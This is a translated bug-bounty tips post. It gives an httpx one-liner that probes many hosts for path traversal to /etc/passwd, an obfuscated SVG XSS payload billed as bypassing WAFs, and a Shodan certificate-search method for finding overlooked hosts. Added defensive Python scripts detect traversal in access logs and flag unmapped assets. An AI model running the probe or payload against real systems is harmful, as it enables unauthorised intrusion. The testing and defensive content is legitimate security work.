Tip 1: Finding LFI in bulk
cat hosts | httpx -nc -t 250 -p 80,443,8080,8443,4443,8888 -path "///////../../../etc/passwd" -mr "root:x" | anew myP1s.txt
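The probe above leaves a very recognisable trace in web-server access logs. As an added example (not part of the original post), the script below scans Apache/nginx-style combined log lines for requests whose decoded target collapses to a sensitive file, the defender's counterpart to the one-liner. The log lines are constructed for this example, and the sensitive-file list is an assumption you should extend for your own platform.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not from the original post).
SAMPLE_LOG = """\
203.0.113.5 - - [21/Apr/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [21/Apr/2022:10:00:02 +0000] "GET ///////../../../etc/passwd HTTP/1.1" 200 1843
203.0.113.9 - - [21/Apr/2022:10:00:03 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0
203.0.113.11 - - [21/Apr/2022:10:00:04 +0000] "GET /static/css/main.css HTTP/1.1" 200 2048
203.0.113.13 - - [21/Apr/2022:10:00:05 +0000] "GET /img/%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 403 0
"""

# Common log format: client ip, ident, user, [timestamp], "METHOD target proto", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Files a traversal probe typically tries to read (assumed list; extend for your platform).
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "/windows/win.ini")


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly (bounded) so %252e%252e and ..%2F are seen as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolved_paths(target):
    """Collapse dot-dot segments in the path and in each query value the way a naive
    filesystem join would, returning the absolute paths they land on."""
    decoded = decode_fully(target).replace("\\", "/")
    path, _, query = decoded.partition("?")
    candidates = [path] + [kv.partition("=")[2] for kv in query.split("&") if kv]
    return [posixpath.normpath("/" + c.lstrip("/")) for c in candidates if ".." in c]


def scan_log(text):
    """Return one finding per request whose decoded target traverses to a sensitive file.
    severity is 'likely-read' when the server answered 200, otherwise 'probe'."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = [p for p in resolved_paths(m["target"]) if p.lower() in SENSITIVE_PATHS]
        if not hits:
            continue
        findings.append({
            "ip": m["ip"],
            "target": m["target"],
            "status": int(m["status"]),
            "resolved": hits[0],
            "severity": "likely-read" if m["status"] == "200" else "probe",
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:<11} {f['ip']:<14} {f['status']} {f['resolved']} <- {f['target']}")
```

A 200 response with a body size in the range of a real `/etc/passwd` (the second sample line) is the case to triage first; the 403 on the double-encoded request shows the WAF caught that variant but a blocked probe is still worth correlating by source address.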
Tip 2:
A payload that bypasses multiple WAFs and demonstrates several obfuscation techniques.
<sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
Tip 3:
How to grab assets that other hackers have overlooked
1. Resolve all subdomains to IP addresses. Save IPs to list1.txt
2. Find the organization name http://target.com uses in SSL certificates
3. Go to http://shodan.io and search ssl:"Target Company"
4. Save the IPs you get from http://shodan.io in list2.txt
5. Remove all the list1.txt IPs from list2.txt
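The five steps above are a set difference between two IP inventories, and the same comparison is what an organisation's own attack-surface review should run: hosts serving the company's certificate that no enumerated DNS name explains. As an added example (not code from the original post), the script below resolves a subdomain list, normalises both lists so junk lines and duplicates do not skew the result, and reports the unmapped addresses plus any names that failed to resolve. The subdomains, Shodan results and DNS answers are constructed so the example runs offline; `resolve_live` is the drop-in for real use.

```python
import ipaddress
import socket

# Constructed inputs for this example (documentation ranges, not real infrastructure).
SUBDOMAINS = ["www.example.com", "api.example.com", "mail.example.com", "old.example.com"]
# list2.txt as it might look after a Shodan export, including a junk line to filter out.
SHODAN_SSL_IPS = ["203.0.113.10", "203.0.113.11", "203.0.113.25", "198.51.100.7", "not-an-ip"]

# Hypothetical DNS answers so the example runs offline.
FAKE_DNS = {
    "www.example.com": ["203.0.113.10"],
    "api.example.com": ["203.0.113.11", "203.0.113.12"],
    "mail.example.com": ["198.51.100.7"],
    # old.example.com intentionally has no record (a dangling name worth noting on its own)
}


def resolve_offline(name):
    """Resolver used by the example: answers from the constructed table above."""
    return FAKE_DNS.get(name, [])


def resolve_live(name):
    """Real resolver: every IPv4 address for a name, empty list on NXDOMAIN or timeout."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(name, None, socket.AF_INET)})
    except socket.gaierror:
        return []


def normalize_ips(values):
    """Parse strings into IP objects, silently dropping lines that are not addresses."""
    out = set()
    for v in values:
        try:
            out.add(ipaddress.ip_address(v.strip()))
        except ValueError:
            continue  # headers, hostnames, blank lines
    return out


def resolve_all(names, resolver):
    """Step 1: every IP any known subdomain points at (list1.txt), plus names with no answer."""
    known, unresolved = set(), []
    for n in names:
        ips = resolver(n)
        if not ips:
            unresolved.append(n)
        known |= normalize_ips(ips)
    return known, unresolved


def unmapped_assets(cert_ips, dns_ips):
    """Step 5: IPs seen under the org's certificate (list2.txt) that no subdomain resolves to."""
    return sorted(normalize_ips(cert_ips) - dns_ips)


if __name__ == "__main__":
    known, unresolved = resolve_all(SUBDOMAINS, resolve_offline)
    for ip in unmapped_assets(SHODAN_SSL_IPS, known):
        print("unmapped host serving the org certificate:", ip)
    for name in unresolved:
        print("subdomain with no DNS answer:", name)
```

The names that do not resolve are reported deliberately: from the defender's side a dangling record is as much an inventory gap as an unmapped host, and from either side it is the list you would check next.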
Tip 4:
A complete collection of business-logic articles. If you read all of these and still don't get it, come pay me tuition first (500) and I'll refund you (200)!
https://medium.com/armourinfosec/exploiting-business-logic-vulnerabilities-234f97d6c4c0
https://medium.com/techiepedia/api-exploitation-business-logic-bug-c176d9df47ee
https://jub0bs.com/posts/2020-05-26-idor/
https://huntr.dev/bounties/35631e3a-f4b9-41ad-857c-7e3021932a72/
https://infosecwriteups.com/web-application-business-logic-vulnerabilities-51be9c6b99fa
https://www.wallarm.com/what/business-logic-flaw
Reports
https://hackerone.com/reports/1505189
https://hackerone.com/reports/672487
https://hackerone.com/reports/331691
https://hackerone.com/reports/1428690
Video
https://www.youtube.com/watch?v=XL_3K9wmIiI&ab_channel=AxonTechnologies
https://www.youtube.com/watch?v=ABhp3aNHHHk&ab_channel=ShiftLeft
https://www.youtube.com/watch?v=OFQmtZ-i1Lw&ab_channel=SpinTheHack
https://www.youtube.com/watch?v=P8B5yQIK-lc&ab_channel=InsiderPhD
https://www.youtube.com/watch?v=RobCqW2KwGs&ab_channel=InsiderPhD
https://www.youtube.com/watch?v=A2F6bjBHmQo&ab_channel=OWASPDkte
Lastly, a Mikami picture to anchor the post. Keep going, keep going, keep going!
Originally published on the WeChat official account 奔跑在Hackerone的路上: Bug Bounty Tips (2022-04-21)